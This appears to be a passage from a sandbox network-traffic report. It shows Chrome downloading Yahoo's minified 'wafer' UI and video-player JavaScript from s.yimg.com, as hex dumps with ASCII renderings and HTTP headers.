                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},f=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 28 6b 2b 22 74 6f 67 67 6c 65 2d 63 6c 61 73 73 22 29 7c 7c 22 22 2c 75 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 62 72 6f 77 73 65 72 2d 64 65 66 61 75 6c 74 2d 62 65 68 61 76 69 6f 72 22 29 2c 6c 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 73 63 72 6f 6c 6c 22 29 2c 66 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 73 79 6e 63 2d 64 65 6c 61 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 22 29 2c 76 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 62 6f 75 6e 64 61 72 79 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (k+"toggle-class")||"",u=e.getAttribute(k+"toggle-prevent-browser-default-behavior"),l=e.getAttribute(k+"toggle-prevent-scroll"),f=e.getAttribute(k+"sync-delay"),d=e.getAttribute(k+"toggle-target"),v=e.getAttribute(k+"toggle-boundary"),h=e.getAttribute(k+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 26 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 6f 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 65 6c 65 6d 2c 72 3d 65 2e 65 76 65 6e 74 73 3b 69 66 28 30 21 3d 3d 72 2e 73 69 7a 65 29 7b 76 61 72 20 6e 3d 21 30 2c 6f 3d 21 31 2c 69 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 61 2c 73 3d 72 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 61 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 6e 3d 21 30 29 7b 76 61 72 20 75 3d 61 2e 76 61 6c 75 65 2c 6c 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &r.setAttribute("aria-controls",o)}},{key:"addEventListeners",value:function(){var e=this._util,t=e.elem,r=e.events;if(0!==r.size){var n=!0,o=!1,i=void 0;try{for(var a,s=r.keys()[Symbol.iterator]();!(n=(a=s.next()).done);n=!0){var u=a.value,l=this._state.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6e 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6f 6e 4c 6f 61 64 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 45 6e 74 65 72 44 65 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 63 6c 69 63 6b 41 6e 64 4d 6f 75 73 65 45 78 69 74 54 69 6d 65 6f 75 74 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nLoad",value:function(){this.processTargets("onLoad")}},{key:"mouseenter",value:function(){this.processTargets("mouseenter")}},{key:"mouseEnterDelay",value:function(){clearTimeout(this._state.clickAndMouseExitTimeout)}},{key:"mouseleave",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 68 69 73 2e 73 77 69 70 65 72 69 67 68 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 6c 65 66 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 6c 65 66 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 72 69 67 68 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 72 69 67 68 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 72 44 72 61 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 64 72 61 67 3d 7b 65 6e 64 58 3a 30 2c 65 6e 64 59 3a 30 2c 6f 76 65 72 61 6c 6c 44 69 72 65 63 74 69 6f 6e 58 3a 30 2c 73 74 61 72 74 58 3a 30 2c 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this.swiperight()}},{key:"swipeleft",value:function(){this.processTargets("swipeleft")}},{key:"swiperight",value:function(){this.processTargets("swiperight")}},{key:"clearDrag",value:function(){this._util.drag={endX:0,endY:0,overallDirectionX:0,startX:0,s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 68 69 73 2e 67 65 74 54 61 72 67 65 74 73 28 66 2c 61 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6e 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 42 6f 6f 6c 65 61 6e 28 63 26 26 75 29 3f 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 75 29 7c 7c 72 3a 72 3b 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 6e 2c 64 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6f 3d 6c 28 6e 2c 32 29 2c 69 3d 6f 5b 30 5d 2c 75 3d 6f 5b 31 5d 2c 63 3d 72 2e 63 6c 61 73 73 4c 69 73 74 2c 66 3d 69 2e 72 65 70 6c 61 63 65 28 22 57 69 74 68 53 79 6e 63 55 49 44 65 6c 61 79 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: his.getTargets(f,a).forEach(function(r){var n=t._util.focusTarget||Boolean(c&&u)?r.querySelector(u)||r:r;t._util.focusTarget=t._util.focusTarget||n,d.forEach(function(n){var o=l(n,2),i=o[0],u=o[1],c=r.classList,f=i.replace("WithSyncUIDelay","").replace("W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 26 26 28 22 31 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6b 65 79 3f 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 61 64 64 22 3a 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 72 65 6d 6f 76 65 22 2c 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 64 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ("stateChange")&&("1"===this._util.key?r.get("stateChange")[0][0]="add":r.get("stateChange")[0][0]="remove",this.processTargets("stateChange"))}},{key:"destroy",value:function(){this.removeEventListeners(),d(t.prototype.__proto__||Object.getPrototypeOf(t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC733INData Raw: 75 29 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 75 7d 72 65 74 75 72 6e 20 75 28 74 2c 65 29 2c 53 28 74 2c 5b 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 50 28 64 6f 63 75 6d 65 6e 74 2c 22 6b 65 79 64 6f 77 6e 22 2c 74 68 69 73 2e 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 3d 65 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2c 65 2e 6b 65 79 43 6f 64 65 29 7b 63 61 73 65 20 32 37 3a 76 61 72 20 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 72 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: u)}),u.addEventListeners(),u}return u(t,e),S(t,[{key:"addEventListeners",value:function(){P(document,"keydown",this._handleKeyDown)}},{key:"_handleKeyDown",value:function(e){switch(e=e||window.event,e.keyCode){case 27:var t=this._state.elementInstances,r=


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              96192.168.2.45111687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC365OUTGET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: pzLy3ypL/bzQyJR408hCGpVWS9yV14Hruag6utg9uMPLWWZLi4CwYgnDjqXCZiIxLs08ls1KAwo=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: TT12GHZBTXDVKWVS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 05:34:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "d133cbea9c1d56d1cbe4cb6e77f0ebf6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 9YmMglcw85BjD8aFXilrFBHITet6QmcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 394722
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 76 69 64 65 6f 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 76 69 64 65 6f 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 69 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 65 29 74 2e 69 6e 64 65 78 4f 66 28 61 29 3e 3d 30 7c 7c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function r(e,t){var i={};for(var a in e)t.indexOf(a)>=0||Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 61 29 7b 72 65 74 75 72 6e 20 69 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 69 29 2c 61 26 26 65 28 74 2c 61 29 2c 74 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 69 2c 61 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 69 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 65 28 6f 2c 69 2c 61 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }return function(t,i,a){return i&&e(t.prototype,i),a&&e(t,a),t}}(),f=function e(t,i,a){null===t&&(t=Function.prototype);var n=Object.getOwnPropertyDescriptor(t,i);if(void 0===n){var o=Object.getPrototypeOf(t);return null===o?void 0:e(o,i,a)}if("value"in n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 61 3d 72 28 65 2c 5b 22 6d 65 74 61 64 61 74 61 22 5d 29 3b 72 65 74 75 72 6e 20 76 28 7b 7d 2c 61 2c 69 29 7d 29 7c 7c 6e 75 6c 6c 2c 77 3d 76 6f 69 64 20 30 3b 69 66 28 6c 29 7b 76 61 72 20 43 3d 6c 5b 22 73 6f 75 72 63 65 2d 6d 65 74 61 64 61 74 61 2d 70 6c 75 67 69 6e 22 5d 7c 7c 7b 7d 2c 62 3d 43 5b 22 6d 65 64 69 61 2f 73 61 70 69 22 5d 3b 62 26 26 28 77 3d 7b 63 75 73 74 6f 6d 50 61 72 61 6d 73 3a 62 2e 71 73 7d 29 7d 76 61 72 20 45 3d 70 2e 64 6f 63 6b 69 6e 67 2c 50 3d 72 28 70 2c 5b 22 64 6f 63 6b 69 6e 67 22 5d 29 2c 6b 3d 6e 75 6c 6c 3b 69 66 28 45 29 7b 76 61 72 20 4f 3d 45 2e 65 6e 61 62 6c 65 4f 6e 53 63 72 6f 6c 6c 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on(e){var t=e.metadata,i=void 0===t?{}:t,a=r(e,["metadata"]);return v({},a,i)})||null,w=void 0;if(l){var C=l["source-metadata-plugin"]||{},b=C["media/sapi"];b&&(w={customParams:b.qs})}var E=p.docking,P=r(p,["docking"]),k=null;if(E){var O=E.enableOnScrollD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 77 68 65 6e 2d 6f 75 74 2d 6f 66 2d 76 69 65 77 70 6f 72 74 22 29 2c 77 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6d 61 6e 61 67 65 2d 6f 6e 2d 69 6e 74 65 72 61 63 74 69 6f 6e 22 29 2c 43 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6c 6f 6f 70 2d 63 6f 75 6e 74 22 29 2c 45 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 69 64 22 29 2c 50 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 74 61 72 67 65 74 22 29 2c 6b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 4f 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 56 3d 65 2e 67 65 74 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Attribute(_+"pause-when-out-of-viewport"),w=e.getAttribute(_+"manage-on-interaction"),C=e.getAttribute(_+"loop-count"),E=e.getAttribute(_+"id"),P=e.getAttribute(_+"target"),k=e.getAttribute(_+"viewability"),O=e.getAttribute(_+"pause-viewability"),V=e.getA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 28 29 2c 6c 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 3d 6e 75 6c 6c 29 2c 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 63 26 26 6c 2e 70 6c 61 79 6c 69 73 74 44 69 64 4d 6f 75 6e 74 28 53 2c 45 29 2c 6c 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 63 28 74 2c 5b 7b 6b 65 79 3a 22 70 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61 79 65 72 3b 65 26 26 28 65 2e 69 73 50 6c 61 79 69 6e 67 28 29 7c 7c 65 2e 70 6c 61 79 28 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 70 6c 61 79 69 6e 67 3d 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 70 61 75 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (),l._state.mouseTimeout=null),"yvideoPlaylist"===c&&l.playlistDidMount(S,E),l}return o(t,e),c(t,[{key:"play",value:function(){var e=this._util.player;e&&(e.isPlaying()||e.play(),this._state.playing=!0)}},{key:"pause",value:function(){var e=this._util.pla
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 22 79 76 69 64 65 6f 22 3d 3d 3d 6e 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 49 6e 73 74 61 6e 63 65 46 72 6f 6d 55 75 69 64 43 6f 6c 6c 65 63 74 69 6f 6e 28 29 2c 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this.removeEventListeners(),"yvideo"===n&&this.removeInstanceFromUuidCollection(),f(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"destroy",this).call(this)}},{key:"_createDefault",value:function(){var e=this;if(arguments.length>0&&void 0!==ar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 76 69 64 65 6f 2d 64 65 66 61 75 6c 74 22 29 3b 76 61 72 20 70 3d 75 2c 6d 3d 28 70 2e 68 65 69 67 68 74 2c 70 2e 77 69 64 74 68 2c 72 28 70 2c 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 5d 29 29 2c 68 3d 7b 7d 3b 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 79 76 69 64 65 6f 22 29 2c 66 26 26 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 2e 61 70 70 6c 79 28 79 2e 63 6c 61 73 73 4c 69 73 74 2c 66 29 2c 75 2e 66 6f 72 63 65 44 69 73 61 62 6c 65 46 69 72 73 74 41 64 26 26 50 28 22 79 76 61 70 46 22 29 3b 76 61 72 20 67 3d 76 28 7b 73 74 61 72 74 73 63 72 65 65 6e 3a 7b 73 68 6f 77 54 69 74 6c 65 3a 21 30 2c 73 68 6f 77 44 65 73 63 3a 21 30 2c 73 68 6f 77 50 72 6f 76 69 64 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: List.add("wafer-video-default");var p=u,m=(p.height,p.width,r(p,["height","width"])),h={};y.classList.add("wafer-yvideo"),f&&y.classList.add.apply(y.classList,f),u.forceDisableFirstAd&&P("yvapF");var g=v({startscreen:{showTitle:!0,showDesc:!0,showProvider
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 65 2e 62 6f 75 6e 64 61 72 79 2c 69 3d 65 2e 65 6c 65 6d 2c 61 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 65 6e 64 2d 73 63 72 6e 2d 63 6c 61 73 73 22 29 2c 6e 3d 61 26 26 74 26 26 62 28 69 2c 74 29 2c 6f 3d 6e 26 26 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6e 64 53 63 72 65 65 6e 45 6c 3d 6f 7d 7d 2c 7b 6b 65 79 3a 22 5f 61 64 64 4e 61 74 69 76 65 56 69 64 65 6f 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 26 26 28 65 2e 6c 6f 6f 70 3d 21 31 2c 67 28 65 2c 22 65 6e 64 65 64 22 2c 74 68 69 73 2e 68
